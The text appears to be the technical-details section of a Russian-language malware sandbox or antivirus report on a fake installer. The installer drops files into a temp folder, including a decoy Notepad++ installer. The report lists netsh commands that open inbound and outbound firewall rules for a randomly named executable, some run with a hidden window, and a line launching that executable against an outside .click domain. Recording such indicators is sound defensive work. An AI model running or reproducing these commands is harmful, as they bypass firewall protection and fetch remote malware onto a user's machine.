Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=asrwpoicessfnq dir=in action=allow program="%TEMP%\nsx5792.tmp\asrwpoicessfnq.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=asrwpoicessfnq dir=out action=allow program="%TEMP%\nsx5792.tmp\asrwpoicessfnq.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nsx5792.tmp\nsexec.dll
- %TEMP%\nsx5792.tmp\basiccalculator1.exe
- %TEMP%\nsx5792.tmp\npp.8.7.5.installer.x64.exe
- %TEMP%\nsx5792.tmp\asrwpoicessfnq.exe
- %TEMP%\nsx5792.tmp\asrwpoicessfnq.exe.config
- %TEMP%\nsx5792.tmp\selfdel.dll
- %TEMP%\nsx5792.tmp\asrwpoicessfnq.exe
- %TEMP%\nsx5792.tmp\asrwpoicessfnq.exe.config
- %TEMP%\nsx5792.tmp\basiccalculator1.exe
- %TEMP%\nsx5792.tmp\npp.8.7.5.installer.x64.exe
- %TEMP%\nsx5792.tmp\nsexec.dll
- %TEMP%\nsx5792.tmp\selfdel.dll
- '%TEMP%\nsx5792.tmp\asrwpoicessfnq.exe' "http://www.cordlesscarbonara.click" "%TEMP%\nsx5792.tmp\8610"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=asrwpoicessfnq dir=out action=allow program="%TEMP%\nsx5792.tmp\asrwpoicessfnq.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=asrwpoicessfnq dir=in action=allow program="%TEMP%\nsx5792.tmp\asrwpoicessfnq.exe" enable=yes profile=public,private (со скрытым окном)